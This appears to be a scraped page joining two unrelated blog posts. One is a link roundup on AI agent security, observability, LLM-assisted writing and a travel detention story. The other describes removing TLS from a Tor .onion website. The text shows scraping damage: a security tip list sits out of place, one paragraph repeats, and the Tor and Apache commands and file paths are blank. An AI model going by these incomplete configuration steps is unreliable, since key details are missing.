Do you want to run OpenClaw? It may be fascinating, but it also raises significant security dangers. Jim Gumbley, one of my go-to sources on security, has some advice on how to mitigate the risks. While there is no proven safe way to run high-permissioned agents today, there are practical patterns that reduce the blast radius. If you want to experiment, you have options, such as cloud VMs or local micro-VM tools like Gondolin. He outlines a series of steps to consider ❄                ❄                ❄                ❄                ❄ Caer Sanders shares impressions from the Pragmatic Summit . From what I’ve seen working with AI organizations of all shapes and sizes, the biggest indicator of dysfunction is a lack of observability. Teams that don’t measure and validate the inputs and outputs of their systems are at the greatest risk of having more incidents when AI enters the picture. I’ve long felt that people underestimated the value of QA in production . Now we’re in a world of non-deterministic construction, a modern perspective of observability will be even more important Caer finishes by drawing a parallel with their experience in robotics If I calculate the load requirements for a robot’s chassis, 3D model it, and then have it 3D-printed, did I build a robot? Or did the 3D printer build the robot? Most people I ask seem to think I still built the robot, and not the 3D printer. … Now, if I craft the intent and design for a system, but AI generates the code to glue it all together, have I created a system? Or did the AI create it? ❄                ❄                ❄                ❄                ❄ Andrej Karpathy is “very interested in what the coming era of highly bespoke software might look like.” He spent half-an-hour vibe coding a individualized dashboard for cardio experiments from a specific treadmill the “app store” of a set of discrete apps that you choose from is an increasingly outdated concept all by itself. The future are services of AI-native sensors & actuators orchestrated via LLM glue into highly custom, ephemeral apps. It’s just not here yet. ❄                ❄                ❄                ❄                ❄ I’ve been asked a few times about the role LLMs should play in writing. I’m mulling on a more considered article about how they help and hinder. For now I’ll say two central points are those that apply to writing with or without them. First, acknowledge anyone who has significantly helped with your piece. If an LLM has given material help, mention how in the acknowledgments. Not just is this being transparent, it also provides information to readers on the potential value of LLMs. Secondly, know your audience. If you know your readers will likely be annoyed by the uncanny valley of LLM prose, then don’t let it generate your text. But if you’re writing a mandated report that you suspect nobody will ever read, then have at it. (I hardly use LLMs for writing, but doubtless I have an inflated opinion of my ability.) ❄                ❄                ❄                ❄                ❄ In a discussion of using specifications as a replacement to code while working with LLMs, a colleague posted the following quotation “What a useful thing a pocket-map is!” I remarked. “That’s another thing we’ve learned from your Nation,” said Mein Herr, “map-making. But we’ve carried it much further than you. What do you consider the largest map that would be really useful?” “About six inches to the mile.” “Only six inches!” exclaimed Mein Herr. “We very soon got to six yards to the mile. Then we tried a hundred yards to the mile. And then came the grandest idea of all! We actually made a map of the country, on the scale of a mile to the mile!” “Have you used it much?” I enquired. “It has never been spread out, yet,” said Mein Herr: “the farmers objected: they said it would cover the whole country, and shut out the sunlight! So we now use the country itself, as its own map, and I assure you it does nearly as well.” from Lewis Carroll, Sylvie and Bruno Concluded, Chapter XI, London, 1893, acquired from a Wikipedia article about a Jorge Luis Borge short story. ❄                ❄                ❄                ❄                ❄ Grady Booch: Human language needs a new pronoun, something whereby an AI may identify itself to its users. When, in conversation, a chatbot says to me “I did this thing”, I - the human - am always bothered by the presumption of its self-anthropomorphizatuon. ❄                ❄                ❄                ❄                ❄ My dear friends in Britain and Europe will not come and visit us in Massachusetts. Some folks may think they are being paranoid, but this story makes their caution understandable. The dream holiday ended abruptly on Friday 26 September, as Karen and Bill were trying to leave the US. When they crossed the border, Canadian officials told them they didn’t have the correct paperwork to bring the car with them. They were turned back to Montana on the American side – and to US border control officials. Bill’s US visa had expired; Karen’s had not. “I worried then,” she says. “I was worried for him. I thought, well, at least I am here to support him.” She didn’t know it at the time, but it was the beginning of an ordeal that would see Karen handcuffed, shackled and sleeping on the floor of a locked cell, before being driven for 12 hours through the night to an Immigration and Customs Enforcement (ICE) detention centre. Karen was incarcerated for a total of six weeks – even though she had been travelling with a valid visa. Prioritize isolation first. Clamp down on network egress. Don’t expose the control plane. Treat secrets as toxic waste. Assume the skills ecosystem is hostile. Run endpoint protection.

0 views
neilzone 2 weeks ago

decoded.legal's .onion site no longer has TLS / https

tl;dr: As of 2026-02-23, http://dlegal66uj5u2dvcbrev7vv6fjtwnd4moqu7j6jnd42rmbypv3coigyd.onion no longer offers TLS. It just has Tor’s own transport encryption. I have run .onion sites for a long time. I like the idea of people being able to access resources within the Tor network, without needing to access the clearweb. These .onion services benefit from Tor’s transport encryption. For the last four years, the decoded.legal onion site ( http://dlegal66uj5u2dvcbrev7vv6fjtwnd4moqu7j6jnd42rmbypv3coigyd.onion ) also had a “normal” TLS certificate. Setting this up was relatively straightforward . However, renewing it is a manual operation and a bit a of a faff, which suggests that I am spoiled by Let’s Encrypt. When the certificate came up for renewal this year, I decided to remove it. Why? Because I’m just not persuaded that the incremental benefits of having TLS over Tor justifies the faff, or the (low) cost. The site still has Tor’s transport encryption. And, if I’m wrong, and I get loads of complaints (of which I am not really expecting a single one), I can also put it back. I did it this way: A few weeks ago, I turned off auto-redirection within my apache2 configuration. This meant that requests to the http onion site would not redirect automatically to the https onion site. I also changed the and headers, sent when someone visits the clearweb site ( https://decoded.legal ), in favour of the http, rather than https, URL for the .onion site. In , I commented out the line which I had put in place for port 443. I restarted Tor ( ). For apache2, I removed the config file symlink, for the https config file, from . I restarted apache2 ( ). A few weeks ago, I turned off auto-redirection within my apache2 configuration. This meant that requests to the http onion site would not redirect automatically to the https onion site. I also changed the and headers, sent when someone visits the clearweb site ( https://decoded.legal ), in favour of the http, rather than https, URL for the .onion site. In , I commented out the line which I had put in place for port 443. I restarted Tor ( ). For apache2, I removed the config file symlink, for the https config file, from . I restarted apache2 ( ).

0 views